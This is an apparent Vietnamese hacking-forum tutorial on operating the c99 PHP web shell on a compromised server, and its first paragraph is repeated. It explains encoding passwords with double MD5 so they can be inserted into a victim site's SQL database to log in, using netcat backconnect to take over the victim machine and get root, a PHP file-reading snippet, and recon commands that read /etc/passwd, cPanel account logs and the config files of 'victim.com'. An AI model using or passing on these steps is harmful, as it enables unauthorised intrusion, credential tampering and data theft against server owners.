Bây giờ sẽ giới thiệu các chức năng để có thể múc nhé. Thứ nhấtđó là Endcode cái này dùng cho những site có dạng mã hóa hay khi cần insert mật khẩu dạng mã hóa vào sql để chúng ta có thể login vào.
Ví dụ: Mật khẩu trong sql của site có dạng mã hóa à ($md5($md5()))
Bây giờ sẽ giới thiệu các chức năng để có thể múc nhé. Thứ nhấtđó là Endcode cái này dùng cho những site có dạng mã hóa hay khi cần insert mật khẩu dạng mã hóa vào sql để chúng ta có thể login vào.
Ví dụ: Mật khẩu trong sql của site có dạng mã hóa à ($md5($md5()))<< mã hóa 2 lần thì chúng ta sẽ Endcode 2 lần mật khẩu chúng ta muốn để login vào.
Thứ 2 đó là Tool: Chức năng của tool thuộc dạng kết nối và làm thiết bị đầu cuối . Ở đây hay dùng backconnect để getroot . Backconnect là một dạng phươngthức để máy chúng ta được nhận là thiết bị đầu cuối của máy nạn nhân như là bàn phím hay chuột của nạn nhân vậy . Muốn backconnect thì trên máy của chúng ta phải dùng netcat cái nàyatula sẽ cho link để anh em down chức năng php code dùng để thực thi các code php ngay trên c99 cái này được dùng để local hay đọc các code tìm user và pass data.
Code:
<?php
$fd = fopen ("...", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
Thứ 3 đó là sql cái này là cái chúng ta hay dùng để connect chỉnh sửa and ..... drop. Phần proc và Sec chủ yếu nói về cấu hình và hoạt động của server. Ok đó là phần bên trên còn đây sẽ là phân bên dưới
1 :: Command execute ::
Cái này để thực hiện các lệnh trên linux hoặc có thể trên windows tùy từng server mà xài một số lệnh cơ bản như sau:
Trích:find /home/victim/public_html/ -type d -perm -2 -ls <-- Tìm các thư mục có thể uploadhoặc các
file có thể ghi đè lên được
cat /etc/passwd : xem File passwd
cat /etc/domains : xem các domains trên sv
cat /var/cpanel/accounting.log : để xem các account trên sv ,
cat /var/cpanel/accounting.log | grep "victim.com" tìm user có domain là victim.com
về apache:
whereis apache
cat /usr/local/apache/conf/httpd.conf
về log
where is log
cat /etc/syslog.conf
cat /etc/hosts : xem IP & domain name của server chính
2 :: Preddy's tricks ::
Dùng để đọc các file hoặc upload file nhưng chú ý dòng chứ bên dưới là gì nếu là ok mầu xanh là ok
Go dir , go files ,make dir, find tương tự vì shell c99 rất dễ sử dụng